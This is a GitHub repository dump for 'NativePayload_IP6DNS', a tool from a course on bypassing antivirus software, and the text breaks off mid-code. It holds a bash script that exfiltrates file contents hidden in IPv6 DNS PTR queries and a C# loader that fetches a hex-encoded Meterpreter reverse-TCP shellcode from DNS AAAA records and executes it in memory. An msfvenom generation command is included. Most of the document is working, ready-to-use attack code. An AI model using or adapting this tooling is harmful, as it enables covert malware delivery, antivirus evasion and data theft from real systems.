├── NativePayload_IP6DNS.png ├── Chapter 6 - DATA Transferring Technique by DNS Traffic - AAAA Records ├── Pics │ ├── NativePayload_IP6DNS-Via-IPv6-AAAA.png │ ├── NativePayload_IP6DNS-Via-IPv6-PTR.png │ └── README.md ├── README.md └── NativePayload_IP6DNS.sh ├── README.md └── NativePayload_IP6DNS.cs /NativePayload_IP6DNS.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_IP6DNS/HEAD/NativePayload_IP6DNS.png -------------------------------------------------------------------------------- /Chapter 6 - DATA Transferring Technique by DNS Traffic - AAAA Records/Pics/NativePayload_IP6DNS-Via-IPv6-AAAA.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_IP6DNS/HEAD/Chapter 6 - DATA Transferring Technique by DNS Traffic - AAAA Records/Pics/NativePayload_IP6DNS-Via-IPv6-AAAA.png -------------------------------------------------------------------------------- /Chapter 6 - DATA Transferring Technique by DNS Traffic - AAAA Records/Pics/NativePayload_IP6DNS-Via-IPv6-PTR.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_IP6DNS/HEAD/Chapter 6 - DATA Transferring Technique by DNS Traffic - AAAA Records/Pics/NativePayload_IP6DNS-Via-IPv6-PTR.png -------------------------------------------------------------------------------- /Chapter 6 - DATA Transferring Technique by DNS Traffic - AAAA Records/Pics/README.md: -------------------------------------------------------------------------------- 1 | # Pictures for two syntaxes : 2 | 3 | for more information about AAAA records you read Chapter 6 and for more information about IPv6 PTR records you can read Chapter 7 4 | 5 | Example A-Step1: (Server Side ) ./NativePayload_IP6DNS.sh -r 6 | 7 | Example A-Step2: (Client Side ) ./NativePayload_IP6DNS.sh -u text.txt DNSMASQ_IPv4 [delay] (sec) [address] xxxx:xxxx 8 | 9 | example IPv4:192.168.56.110 : ./NativePayload_IP6DNS.sh -r 10 | 11 | example IPv4:192.168.56.111 : ./NativePayload_IP6DNS.sh -u text.txt 192.168.56.110 delay 0 address fe81:2222 12 | 13 | Description: with A-Step1 you will make DNS Server , with A-Step2 you can Send text file via IPv6 PTR Queries to DNS server 14 | 15 | Example B-Step1: (Server Side ) ./NativePayload_IP6DNS.sh -d makedns test.txt mydomain.com [address] xxxx:xxxx 16 | 17 | Example B-Step2: (Client Side ) ./NativePayload_IP6DNS.sh -d getdata mydomain.com DNSMASQ_IPv4" 18 | 19 | example IPv4:192.168.56.110 : ./NativePayload_IP6DNS.sh -d makedns text.txt google.com address fe80:1234 20 | 21 | example IPv4:192.168.56.111 : ./NativePayload_IP6DNS.sh -d getdata google.com 192.168.56.110 22 | 23 | Description: with B-Step1 you will have DNS Server , with B-Step2 you can Dump test.txt file from server via IPv6 AAAA record Query 24 | -------------------------------------------------------------------------------- /Chapter 6 - DATA Transferring Technique by DNS Traffic - AAAA Records/README.md: -------------------------------------------------------------------------------- 1 | # Course : Bypassing Anti Viruses by C#.NET Programming 2 | 3 | Part 2 (Infil/Exfiltration/Transferring Techniques by C#) , Chapter 6 : DATA Transferring Technique by DNS Traffic (AAAA Records) 4 | 5 | eBook : Bypassing Anti Viruses by C#.NET Programming 6 | 7 | eBook chapter 4 , PDF Download : https://github.com/DamonMohammadbagher/eBook-BypassingAVsByCSharp/tree/master/CH6 8 | 9 | Related Video : 10 | 11 | Video 2 for chapter 6: https://www.youtube.com/watch?v=Ac651MbNJ_U 12 | 13 | Video 1 for chapter 7: https://www.youtube.com/watch?v=9jiry5b-oPo 14 | 15 | Video 2 for chapter 7: https://www.youtube.com/watch?v=6Lj-2KkHqgA 16 | 17 | Warning :Don't Use "www.virustotal.com" or something like that , Never Ever ;D 18 | 19 | Recommended: 20 | 21 | STEP 1 : Use each AV one by one in your LAB . 22 | 23 | STEP 2 : after "AV Signature Database Updated" your Internet Connection should be "Disconnect" . 24 | 25 | STEP 3 : Now you can Copy and Paste your C# code to your Virtual Machine for test . 26 | 27 | # NativePayload_IP6DNS.sh help : 28 | 29 | Example A-Step1: (Server Side ) ./NativePayload_IP6DNS.sh -r 30 | 31 | Example A-Step2: (Client Side ) ./NativePayload_IP6DNS.sh -u text.txt DNSMASQ_IPv4 [delay] (sec) [address] xxxx:xxxx 32 | 33 | example IPv4:192.168.56.110 : ./NativePayload_IP6DNS.sh -r 34 | 35 | example IPv4:192.168.56.111 : ./NativePayload_IP6DNS.sh -u text.txt 192.168.56.110 delay 0 address fe81:2222 36 | 37 | Description: with A-Step1 you will make DNS Server , with A-Step2 you can Send text file via IPv6 PTR Queries to DNS server 38 | 39 | # Using IPv6 PTR Queries for Exfil/Upload DATA 40 | 41 | ![](https://github.com/DamonMohammadbagher/NativePayload_IP6DNS/blob/master/Chapter%206%20-%20DATA%20Transferring%20Technique%20by%20DNS%20Traffic%20-%20AAAA%20Records/Pics/NativePayload_IP6DNS-Via-IPv6-PTR.png) 42 | 43 | Example B-Step1: (Server Side ) ./NativePayload_IP6DNS.sh -d makedns test.txt mydomain.com [address] xxxx:xxxx 44 | 45 | Example B-Step2: (Client Side ) ./NativePayload_IP6DNS.sh -d getdata mydomain.com DNSMASQ_IPv4" 46 | 47 | example IPv4:192.168.56.110 : ./NativePayload_IP6DNS.sh -d makedns text.txt google.com address fe80:1234 48 | 49 | example IPv4:192.168.56.111 : ./NativePayload_IP6DNS.sh -d getdata google.com 192.168.56.110 50 | 51 | Description: with B-Step1 you will have DNS Server , with B-Step2 you can Dump test.txt file from server via IPv6 AAAA record Query 52 | 53 | # Using IPv6 AAAA Records for Infil/Download DATA 54 | 55 | ![](https://github.com/DamonMohammadbagher/NativePayload_IP6DNS/blob/master/Chapter%206%20-%20DATA%20Transferring%20Technique%20by%20DNS%20Traffic%20-%20AAAA%20Records/Pics/NativePayload_IP6DNS-Via-IPv6-AAAA.png) 56 | 57 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # NativePayload_IP6DNS 2 | Published by Damon Mohammadbagher 3 | 4 | this tool working like NativePayload_DNS , but in this case this tool working by IPv6 Address and AAAA records for Transferring Backdoor payloads by DNS Traffic ;) 5 | 6 | 7 | note : this code supported only 990 bytes (99 lines IPV6 ADDRESS foreach 10 bytes) for Payloads , for changing this value you should change source code 8 | 9 | note : {fe80:1111:}{fc48:83e4:f0e8:cc00:0000}{:ae0} {test.domain.com} 10 | 11 | note : 10 bytes Payload ==> {fc48:83e4:f0e8:cc00:0000} and {:ae0} is payload counter or ID 12 | 13 | 14 | Example: msfvenum --arch x86_64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.113 -f c > /payload_string.txt 15 | 16 | Replace your Payload_strings.txt file from "\0xfc\0x48\0x83..." to "fc4883..." 17 | 18 | syntax 1 : NativePayload_IP6DNS.exe null "payload string" 19 | 20 | Description 1 : Making Hosts files for Linux Dns Server Like Dnsmasq or dnsspoof tools , copy output for this command to DNS Hosts file in linux 21 | you can use Msfvenom tool like example and copy your payload in "payload string" 22 | 23 | Example : payload string ==> fc4883e4f0e8cc000000415141505251564831d2ae1 24 | 25 | Example: NativePayload_IP6DNS.exe null "payload string" > /dnsmasq.hosts 26 | 27 | after this command you have something like these lines in your Hosts file : 28 | 29 | Example : /etc/dnsmasq.hosts or /etc/hosts "depend on your configuration for dnsmasq or dnsspoof tools 30 | 31 | fe80:1111:fc48:83e4:f0e8:cc00:0000:ae0 test.domain.com 32 | 33 | fe80:1111:4151:4150:5251:5648:31d2:ae1 test.domain.com 34 | 35 | fe80:1111:6548:8b52:6048:8b52:1848:ae2 test.domain.com 36 | 37 | fe80:1111:8b52:2048:8b72:5048:0fb7:ae3 test.domain.com 38 | 39 | fe80:1111:4a4a:4d31:c948:31c0:ac3c:ae4 test.domain.com 40 | 41 | fe80:1111:617c:022c:2041:c1c9:0d41:ae5 test.domain.com 42 | 43 | . 44 | 45 | . 46 | 47 | . 48 | 49 | fe80:1111:85f6:75b4:41ff:e758:6a00:ae49 test.domain.com 50 | 51 | fe80:1111:5949:c7c2:f0b5:a256:ffd5:ae50 test.domain.com 52 | 53 | 54 | 55 | 56 | 57 | syntax 2 : NativePayload_IP6DNS.exe Payload 58 | 59 | description 2 : this switch is for making sample payload for your hosts file 60 | 61 | 62 | syntax 3 : NativePayload_IP6DNS.exe "FQDN" "Fake_DNS_Server" 63 | 64 | description 3 : after making your payloads and copy that in your fake_DNS_Server by dnsmasq or dnsspoof and starting fakeDNSServer , now you can start transferring your Payloads From FakeDNSServer to your Infected system by NativePayload_IP6DNS.exe tool 65 | 66 | Example : NativePayload_IP6DNS.exe test.domain.com 192.168.1.113 67 | 68 | note : in this case 192.168.1.113 is your FakeDNSServer also this is your Metasploit: Meterpreter/Listener. 69 | 70 | you should have meterpreter session after 1 DNS Response from FakeDNSserver to Client (Backdoor system) 71 | 72 | Article : Transferring Backdoor Payloads by DNS AAAA records and IPv6 Address: 73 | 74 | link 0: https://www.linkedin.com/pulse/transferring-backdoor-payloads-dns-aaaa-records-ipv6-mohammadbagher 75 | 76 | link 1: https://www.peerlyst.com/posts/transferring-backdoor-payloads-by-dns-aaaa-records-and-ipv6-address-damon-mohammadbagher 77 | 78 |

79 | 80 | -------------------------------------------------------------------------------- /Chapter 6 - DATA Transferring Technique by DNS Traffic - AAAA Records/NativePayload_IP6DNS.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | echo 3 | echo "NativePayload_IP6DNS.sh , Published by Damon Mohammadbagher 2017-2018" 4 | echo "Injecting/Downloading/Uploading DATA to DNS Traffic via IPv6 DNS AAAA/PTR Records" 5 | echo "help syntax: ./NativePayload_IP6DNS.sh help" 6 | echo 7 | if [ $1 == "help" ] 8 | then 9 | tput setaf 2; 10 | echo 11 | echo "Example A-Step1: (Server Side ) ./NativePayload_IP6DNS.sh -r" 12 | echo "Example A-Step2: (Client Side ) ./NativePayload_IP6DNS.sh -u text.txt DNSMASQ_IPv4 [delay] (sec) [address] xxxx:xxxx" 13 | echo "example IPv4:192.168.56.110 : ./NativePayload_IP6DNS.sh -r" 14 | echo "example IPv4:192.168.56.111 : ./NativePayload_IP6DNS.sh -u text.txt 192.168.56.110 delay 0 address fe81:2222" 15 | echo "Description: with A-Step1 you will make DNS Server , with A-Step2 you can Send text file via IPv6 PTR Queries to DNS server" 16 | echo 17 | echo "Example B-Step1: (Server Side ) ./NativePayload_IP6DNS.sh -d makedns test.txt mydomain.com [address] xxxx:xxxx" 18 | echo "Example B-Step2: (Client Side ) ./NativePayload_IP6DNS.sh -d getdata mydomain.com DNSMASQ_IPv4" 19 | echo "example IPv4:192.168.56.110 : ./NativePayload_IP6DNS.sh -d makedns text.txt google.com address fe80:1234" 20 | echo "example IPv4:192.168.56.111 : ./NativePayload_IP6DNS.sh -d getdata google.com 192.168.56.110" 21 | echo "Description: with B-Step1 you will have DNS Server , with B-Step2 you can Dump test.txt file from server via IPv6 AAAA record Query" 22 | echo 23 | fi 24 | 25 | # uploading data via PTR queries (Client Side "A") 26 | if [ $1 == "-u" ] 27 | then 28 | ########### 29 | DefAddr="fe80:1111" 30 | if [ $6 == "address" ] 31 | then 32 | DefAddr=$7 33 | elif [ $6 == null ] 34 | then 35 | DefAddr="fe80:1111" 36 | fi 37 | delaytime=0 38 | if [ $4 == "delay" ] 39 | then 40 | delaytime=$5 41 | elif [ $4 == null ] 42 | then 43 | delaytime=0 44 | fi 45 | 46 | c=0 47 | octets="" 48 | tput setaf 9; 49 | #echo " " > DnsHost.txt 50 | #echo " " > TempDnsHost.txt 51 | RecordsIDcounter=0 52 | IPv6Oct=0 53 | counts=0 54 | echo 55 | tput setaf 9; 56 | echo "[!] [Exfil/Uploading DATA] via IPv6 DNS PTR Record Queries" 57 | echo "[!] Sending DNS Lookup to DNS Server: " $3 58 | echo "[!] Sending DNS Lookup by Delay (sec): " $delaytime 59 | tput setaf 2; 60 | echo 61 | for op in `xxd -p -c 1 $2`; do 62 | 63 | #echo "[!] injecting this text via IPv6 octet:" "`echo $op | xxd -r -p`" " ==byte==> " $op 64 | 65 | if (($IPv6Oct == 0)) 66 | then 67 | octets+=$op 68 | ((IPv6Oct++)) 69 | elif (($IPv6Oct == 1)) 70 | then 71 | octets+=$op":" 72 | IPv6Oct=0 73 | #debug only 74 | #echo "[!] injecting this text via IPv6 octet:" "`echo $octets | xxd -r -p`" " ==byte==> " $octets 75 | #debug only 76 | fi 77 | ((c++)) 78 | if(($c == 12)) 79 | then 80 | tput setaf 2; 81 | echo -------------------------- 82 | tput setaf 3; 83 | echo "[!] Your IPv6 is : " $DefAddr:"${octets::-1}" 84 | Data="${octets::-1}" 85 | tput setaf 6; 86 | echo "[!] Your Text/Data for this IPv6 is : " `echo $Data | xxd -r -p ` 87 | #echo $DefAddr:"${octets::-1}":$RecordsIDcounter $4 >> TempDnsHost.txt 88 | time=`date '+%d/%m/%y %H:%M:%S'` 89 | tput setaf 9; 90 | echo "[>] [$counts] [$time] Sending Text/Data via Nslookup Done" 91 | MyIPv6address=$DefAddr:"${octets::-1}" 92 | nslookup -type=aaaa $MyIPv6address $3 | grep arpa 93 | tput setaf 2; 94 | ((counts++)) 95 | sleep $delaytime 96 | tput setaf 9; 97 | octets="" 98 | c=0 99 | ((RecordsIDcounter++)) 100 | else 101 | tput setaf 9; 102 | fi 103 | 104 | if(($RecordsIDcounter == 9999)) 105 | then 106 | echo "[!] Oops Your IPv6 counter (z) was upper than 9999 : " "${octets::-1}".$RecordsIDcounter 107 | break 108 | fi 109 | done 110 | ######### 111 | 112 | tput setaf 2; 113 | echo 114 | echo "[!] Sending Done by ($counts) Request." 115 | echo 116 | tput setaf 9; 117 | 118 | fi 119 | 120 | # download data via AAAA records queries 121 | if [ $1 == "-d" ] 122 | then 123 | 124 | # Syntax : NativePayload_IP6DNS.sh -d getdata domain_name DnsMasq_IPv4" (CLIENT SIDE "B") 125 | if [ $2 == "getdata" ] 126 | then 127 | 128 | tput setaf 9; 129 | echo "[!] Downloading Mode , Dump Text DATA via DNS IPv6 AAAA Records " 130 | tput setaf 2; 131 | echo "[!] Sending DNS A Records Queries for Domain :" $3 "to DNSMASQ-Server:" $4 132 | echo "[!] to dump test.txt file via AAAA records you should use this syntax in server side:" 133 | tput setaf 9; 134 | echo "[!] Syntax : NativePayload_IP6DNS.sh -d makedns test.txt google.com" 135 | 136 | # old ver : nslookup -type=aaaa google.com 127.0.0.1 | grep AAAA | awk {'print $5'} | sort -t: -k 8 -n 137 | PayloadLookups=`nslookup -type=aaaa $3 $4 | grep AAAA | awk {'print $5'} | sort -t: -k 8 -n` 138 | 139 | # new ver : for some versions of nslookup you need this syntax 140 | if (( `echo ${#PayloadLookups}` == 0 )) 141 | then 142 | PayloadLookups=`nslookup -type=aaaa $3 $4 | grep Address: | awk {'print $2'} | sort -t: -k 8 -n` 143 | tput setaf 9; 144 | echo "[>] Warning , Nslookup Result via [grep AAAA] was null , Sending request again via [grep Address:]" 145 | echo "[!] Warning , it means Nslookup query sent (2) times" 146 | fi 147 | 148 | tput setaf 9; 149 | echo "[>] Dumped this Text via DNS AAAA Record Query:" 150 | echo 151 | AAAARecordscounter=0 152 | 153 | for op in $PayloadLookups; do 154 | if [[ $op != *"#53"* ]]; 155 | then 156 | Lookups+=`echo $op | cut -d':' -f3` 157 | Lookups+=`echo $op | cut -d':' -f4` 158 | Lookups+=`echo $op | cut -d':' -f5` 159 | Lookups+=`echo $op | cut -d':' -f6` 160 | Lookups+=`echo $op | cut -d':' -f7` 161 | echo $Lookups | xxd -r -p 162 | Lookups="" 163 | ((AAAARecordscounter++)) 164 | fi 165 | done 166 | 167 | echo 168 | echo 169 | tput setaf 2; 170 | echo "[!] Dumping Done , Performed by" $((AAAARecordscounter)) "DNS AAAA Records for domain :" $3 "from Server:" $4 171 | echo 172 | fi 173 | 174 | # Creating DNS Server and DNSHOST.TXT file (SERVER SIDE "B") 175 | # NativePayload_IP6DNS.sh -d makedns text-file mydomain.com address fe80:1111 176 | if [ $2 == "makedns" ] 177 | then 178 | DefAddr="fe80:1111" 179 | if [ $5 == "address" ] 180 | then 181 | DefAddr=$6 182 | elif [ $5 == null ] 183 | then 184 | DefAddr="fe80:1111" 185 | fi 186 | c=0 187 | octets="" 188 | tput setaf 9; 189 | echo " " > DnsHost.txt 190 | echo " " > TempDnsHost.txt 191 | RecordsIDcounter=0 192 | IPv6Oct=0 193 | 194 | for op in `xxd -p -c 1 $3`; do 195 | 196 | #echo "[!] injecting this text via IPv6 octet:" "`echo $op | xxd -r -p`" " ==byte==> " $op 197 | 198 | if (($IPv6Oct == 0)) 199 | then 200 | octets+=$op 201 | ((IPv6Oct++)) 202 | elif (($IPv6Oct == 1)) 203 | then 204 | octets+=$op":" 205 | IPv6Oct=0 206 | # debug only 207 | #echo "[!] injecting this text via IPv6 octet:" "`echo $octets | xxd -r -p`" " ==byte==> " $octets 208 | # debug only 209 | 210 | fi 211 | ((c++)) 212 | if(($c == 10)) 213 | then 214 | tput setaf 9; 215 | 216 | echo "[!] injecting this text via IPv6 Address (10bytes) :" "`echo $octets | xxd -r -p`" " ==byte==> " $octets 217 | tput setaf 3; 218 | echo "[!] Your IPv6 is : " $DefAddr:"${octets::-1}":$RecordsIDcounter 219 | Data="${octets::-1}" 220 | echo "[!] Your Text/Data for this IPv6 is : " `echo $Data | xxd -r -p ` 221 | echo ------------------------- 222 | echo $DefAddr:"${octets::-1}":$RecordsIDcounter $4 >> TempDnsHost.txt 223 | tput setaf 9; 224 | octets="" 225 | c=0 226 | ((RecordsIDcounter++)) 227 | else 228 | tput setaf 9; 229 | fi 230 | 231 | if(($RecordsIDcounter == 9999)) 232 | then 233 | echo "[!] Oops Your IPv6 counter (z) was upper than 9999 : " "${octets::-1}".$RecordsIDcounter 234 | break 235 | fi 236 | done 237 | 238 | echo 239 | tput setaf 2; 240 | echo "[!] DnsHost.txt Created by" $RecordsIDcounter "AAAA Records for Domain:" $4 241 | echo "[!] you can use this DNSHOST.TXT file via Dnsmasq tool" 242 | tput setaf 2; 243 | echo "[!] to dump these AAAA records you should use this syntax in client side:" 244 | tput setaf 9; 245 | echo "[!] Syntax : NativePayload_IP6DNS.sh -d getdata domain_name DnsMasq_IPv4" 246 | echo 247 | echo "[>] DNSMASQ Started by DNSHOST.TXT File" 248 | echo 249 | tput setaf 9; 250 | # sort by -k4 : wxyz:wxyz:xxxx:XXXX:x:x:x:z 251 | cat TempDnsHost.txt | sort -t: -k4 -n > DnsHost.txt 252 | `dnsmasq --no-hosts --no-daemon --log-queries -H DnsHost.txt` 253 | tput setaf 9; 254 | 255 | 256 | fi 257 | 258 | fi 259 | 260 | # make DNS Server for Dump DATA via DNS PTR Queries (Server Side "A") 261 | # Reading Mode (log data via dnsmasq log files) 262 | if [ $1 == "-r" ] 263 | then 264 | tput setaf 9; 265 | echo "[>] Reading Mode , DNSMASQ Started by this log file : /var/log/dnsmasq.log !" 266 | tput setaf 2; 267 | echo "" > /var/log/dnsmasq.log 268 | `dnsmasq --no-hosts --no-daemon --log-queries --log-facility=/var/log/dnsmasq.log` & 269 | filename="/var/log/dnsmasq.log" 270 | fs=$(stat -c%s "$filename") 271 | count=0 272 | while true; do 273 | tput setaf 2; 274 | sleep 10 275 | fs2=$(stat -c%s "$filename") 276 | if [ "$fs" != "$fs2" ] ; 277 | then 278 | 279 | tput setaf 6; 280 | echo "[!] /var/log/dnsmasq.log File has changed!" 281 | echo "[!] Checking Queries" 282 | fs=$(stat -c%s "$filename") 283 | fs2=$(stat -c%s "$filename") 284 | 285 | IP6PTRecordsTemp=`cat $filename | grep PTR | awk {'print $6'} | tr -d '.'` 286 | time=`date '+%d/%m/%y %H:%M:%S'` 287 | echo "[!] ["$time"] Dump this Text via IPv6 PTR Queries" 288 | 289 | tput setaf 9; 290 | Dumptext="" 291 | for ops1 in `echo $IP6PTRecordsTemp`; do 292 | 293 | IP6PTRecords=`echo "${ops1::-15}" | rev` 294 | 295 | echo $IP6PTRecords | xxd -r -p 296 | Dumptext+=`echo $IP6PTRecords | xxd -r -p` 297 | done 298 | echo 299 | tput setaf 6; 300 | echo "[>] this Text Saved to ExfilDump.txt" 301 | echo $Dumptext > ExfilDump.txt 302 | tput setaf 2; 303 | else 304 | fs=$(stat -c%s "$filename") 305 | fs2=$(stat -c%s "$filename") 306 | tput setaf 2; 307 | fi 308 | done 309 | fi 310 | -------------------------------------------------------------------------------- /NativePayload_IP6DNS.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Net; 6 | using System.Diagnostics; 7 | using System.Data; 8 | using System.Runtime.InteropServices; 9 | 10 | namespace NativePayload_IP6DNS 11 | { 12 | class Program 13 | { 14 | static string payload = "fc4883e4f0e8cc0000004151415052" 15 | + "51564831d265488b5260488b521848" 16 | + "8b5220488b7250480fb74a4a4d31c9" 17 | + "4831c0ac3c617c022c2041c1c90d41" 18 | + "01c1e2ed524151488b52208b423c48" 19 | + "01d0668178180b020f85720000008b" 20 | + "80880000004885c074674801d0508b" 21 | + "4818448b40204901d0e35648ffc941" 22 | + "8b34884801d64d31c94831c0ac41c1" 23 | + "c90d4101c138e075f14c034c240845" 24 | + "39d175d858448b40244901d066418b" 25 | + "0c48448b401c4901d0418b04884801" 26 | + "d0415841585e595a41584159415a48" 27 | + "83ec204152ffe05841595a488b12e9" 28 | + "4bffffff5d49be7773325f33320000" 29 | + "41564989e64881eca00100004989e5" 30 | + "49bc0200115cc0a8013241544989e4" 31 | + "4c89f141ba4c772607ffd54c89ea68" 32 | + "010100005941ba29806b00ffd56a05" 33 | + "415e50504d31c94d31c048ffc04889" 34 | + "c248ffc04889c141baea0fdfe0ffd5" 35 | + "4889c76a1041584c89e24889f941ba" 36 | + "99a57461ffd585c0740a49ffce75e5" 37 | + "e8930000004883ec104889e24d31c9" 38 | + "6a0441584889f941ba02d9c85fffd5" 39 | + "83f8007e554883c4205e89f66a4041" 40 | + "59680010000041584889f24831c941" 41 | + "ba58a453e5ffd54889c34989c74d31" 42 | + "c94989f04889da4889f941ba02d9c8" 43 | + "5fffd583f8007d2858415759680040" 44 | + "000041586a005a41ba0b2f0f30ffd5" 45 | + "575941ba756e4d61ffd549ffcee93c" 46 | + "ffffff4801c34829c64885f675b441" 47 | + "ffe7586a005949c7c2f0b5a256ffd5"; 48 | 49 | public static DataTable _IPV6_IPAddress_Payloads; 50 | 51 | static void Main(string[] args) 52 | { 53 | 54 | try 55 | { 56 | _IPV6_IPAddress_Payloads = new DataTable(); 57 | 58 | _IPV6_IPAddress_Payloads.Columns.Add("Pay_id", typeof(int)); 59 | _IPV6_IPAddress_Payloads.Columns.Add("Payload", typeof(string)); 60 | _IPV6_IPAddress_Payloads.DefaultView.Sort = "Pay_id"; 61 | _IPV6_IPAddress_Payloads.DefaultView.ToTable("Pay_id"); 62 | 63 | Console.ForegroundColor = ConsoleColor.DarkYellow; 64 | Console.WriteLine(); 65 | Console.WriteLine("NativePayload_IPv6DNS tool Published by Damon Mohammadbagher"); 66 | Console.ForegroundColor = ConsoleColor.Green; 67 | Console.WriteLine("Transferring Backdoor Payloads by IPv6_Address and DNS traffic ;)"); 68 | Console.ForegroundColor = ConsoleColor.Gray; 69 | if (args[0].ToUpper() == "PAYLOAD") 70 | { 71 | Console.WriteLine("Note this code supported only 99 * 10 = 990 bytes payload "); 72 | Console.WriteLine("Note this code supported only 99 lines foreach 10 bytes payload \n"); 73 | 74 | int c = 0; 75 | int counter = 0; 76 | int b = 0; 77 | string temp = ""; 78 | foreach (char item in payload) 79 | { 80 | if (c >= 3) 81 | { temp += item + ":"; c = 0; } 82 | else if (c <= 4) { temp += item; c++; } 83 | 84 | b++; 85 | 86 | if (b >= 20) 87 | { 88 | 89 | if (counter <= 99) 90 | { 91 | Console.Write("fe80:" + "1111:" + temp + "ae" + counter); 92 | } 93 | else if (counter >= 100) 94 | { 95 | Console.Write("fe80:" + "1111:" + temp + "a" + counter); 96 | } 97 | else if (counter >= 999) 98 | { 99 | Console.Write("fe80:" + "1111:" + temp + "" + counter); 100 | } 101 | Console.WriteLine(""); b = 0; 102 | temp = ""; 103 | counter++; 104 | } 105 | 106 | } 107 | 108 | }else if (args[0].ToUpper() == "NULL") 109 | { 110 | Console.WriteLine("Note this code supported only 99 * 10 = 990 bytes payload "); 111 | Console.WriteLine("Note this code supported only 99 lines foreach 10 bytes payload \n"); 112 | 113 | payload = args[1]; 114 | int c = 0; 115 | int counter = 0; 116 | int b = 0; 117 | string temp = ""; 118 | foreach (char item in payload) 119 | { 120 | if (c >= 3) 121 | { temp += item + ":"; c = 0; } 122 | else if (c <= 4) { temp += item; c++; } 123 | 124 | b++; 125 | 126 | if (b >= 20) 127 | { 128 | 129 | if (counter <= 99) 130 | { 131 | Console.Write("fe80:" + "1111:" + temp + "ae" + counter); 132 | } 133 | else if (counter >= 100) 134 | { 135 | Console.Write("fe80:" + "1111:" + temp + "a" + counter); 136 | } 137 | else if (counter >= 999) 138 | { 139 | Console.Write("fe80:" + "1111:" + temp + "" + counter); 140 | } 141 | Console.WriteLine(""); b = 0; 142 | temp = ""; 143 | counter++; 144 | } 145 | 146 | } 147 | 148 | } 149 | else 150 | { 151 | try 152 | { 153 | __nslookup(args[0], args[1]); 154 | 155 | Exploit(_IPV6_IPAddress_Payloads); 156 | } 157 | catch (Exception exp) 158 | { 159 | Console.WriteLine("Main exploit : " + exp.Message); 160 | } 161 | } 162 | 163 | } 164 | catch (Exception main) 165 | { 166 | Console.WriteLine("Main : " + main.Message); 167 | } 168 | 169 | } 170 | 171 | static void Exploit(DataTable payloads) 172 | { 173 | string ss = ""; 174 | byte[] __Bytes = new byte[payloads.Rows.Count * 2]; 175 | for (int i = 0; i < payloads.Rows.Count; i++) 176 | { 177 | try 178 | { 179 | // with Round-robin this code was necessary to sort payloads ;) 180 | EnumerableRowCollection filter = payloads.AsEnumerable().Where(r => r.Field("Pay_id") == i); 181 | foreach (DataRow item in filter) 182 | { 183 | ss += item.ItemArray[1].ToString(); 184 | } 185 | } 186 | catch (Exception) 187 | { 188 | 189 | 190 | } 191 | } 192 | try 193 | { 194 | Console.Write(""); 195 | int Oonagi = payloads.Rows.Count * 2; 196 | int t = 0; 197 | for (int k = 0; k < Oonagi; k++) 198 | { 199 | string _tmp1 = ss.Substring(t, 2); 200 | byte current1 = Convert.ToByte(_tmp1, 16); 201 | // debug only , print payload string 202 | Console.Write(_tmp1); 203 | __Bytes[k] = current1; 204 | t++; 205 | t++; 206 | 207 | } 208 | 209 | Console.WriteLine(); 210 | Console.ForegroundColor = ConsoleColor.Gray; 211 | Console.WriteLine("Bingo Meterpreter session by IPv6_Address and DNS traffic ;)"); 212 | Console.WriteLine("DNS Round-Robin Supported"); 213 | UInt32 funcAddr = VirtualAlloc(0, (UInt32)__Bytes.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); 214 | Marshal.Copy(__Bytes, 0, (IntPtr)(funcAddr), __Bytes.Length); 215 | IntPtr hThread = IntPtr.Zero; 216 | UInt32 threadId = 0; 217 | IntPtr pinfo = IntPtr.Zero; 218 | 219 | hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); 220 | WaitForSingleObject(hThread, 0xFFFFFFFF); 221 | } 222 | catch (Exception ops1) 223 | { 224 | 225 | Console.WriteLine("Exploit: " + ops1.Message); 226 | } 227 | } 228 | 229 | public static void __nslookup(string DNS_AAAA_A, string DnsServer) 230 | { 231 | 232 | int breakpoint_1 = 0; 233 | string last_octet_tmp = ""; 234 | 235 | /// Length for injected payloads by IPv6 Addresss 236 | int Final_payload_count = 0; 237 | 238 | try 239 | { 240 | 241 | /// Make DNS traffic for getting Meterpreter Payloads by nslookup 242 | ProcessStartInfo ns_Prcs_info = new ProcessStartInfo("nslookup.exe", DNS_AAAA_A + " " + DnsServer); 243 | ns_Prcs_info.RedirectStandardInput = true; 244 | ns_Prcs_info.RedirectStandardOutput = true; 245 | ns_Prcs_info.UseShellExecute = false; 246 | /// you can use Thread Sleep here 247 | 248 | Process nslookup = new Process(); 249 | nslookup.StartInfo = ns_Prcs_info; 250 | nslookup.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; 251 | nslookup.Start(); 252 | 253 | string result_Line0 = ""; 254 | string computerList = nslookup.StandardOutput.ReadToEnd(); 255 | string[] All_lines = computerList.Split('\t', 'n'); 256 | int PayloadLines_current_id = 0; 257 | 258 | 259 | 260 | /// Getting First Line of Meterpreter Payload Lines ;) 261 | /// Getting First Line of Meterpreter Payload Lines ;) 262 | try 263 | { 264 | for (int x = 0; x < All_lines.Length; x++) 265 | { 266 | Console.ForegroundColor = ConsoleColor.DarkGreen; 267 | if (All_lines[x].ToUpper().Contains("ADDRESSES:")) 268 | { 269 | /// Getting First Line of Meterpreter Payload Lines ;) 270 | int f = All_lines[x].IndexOf("Addresses: ") + "Addresses: ".Length; 271 | int l = All_lines[x].LastIndexOf("\r\n"); 272 | result_Line0 = All_lines[x].Substring(f, l - f); 273 | breakpoint_1 = x; 274 | break; 275 | } 276 | 277 | 278 | } 279 | Console.WriteLine(); 280 | // Debug only {show address line 0} 281 | //Console.Write(result_Line0); 282 | Console.WriteLine(); 283 | /// normalize Address 0:0:0 ==> 0000:0000:0000 284 | /// normalize Address 0:0:0 ==> 0000:0000:0000 285 | string[] temp_normalize0 = result_Line0.Split(':'); 286 | 287 | /// finding hidden zero in address octets ;) 288 | for (int ix = 0; ix < temp_normalize0.Length; ix++) 289 | { 290 | int count = temp_normalize0[ix].Length; 291 | Console.ForegroundColor = ConsoleColor.DarkGreen; 292 | if (count < 4) 293 | { 294 | Console.ForegroundColor = ConsoleColor.Green; 295 | for (int j = 0; j < 4 - 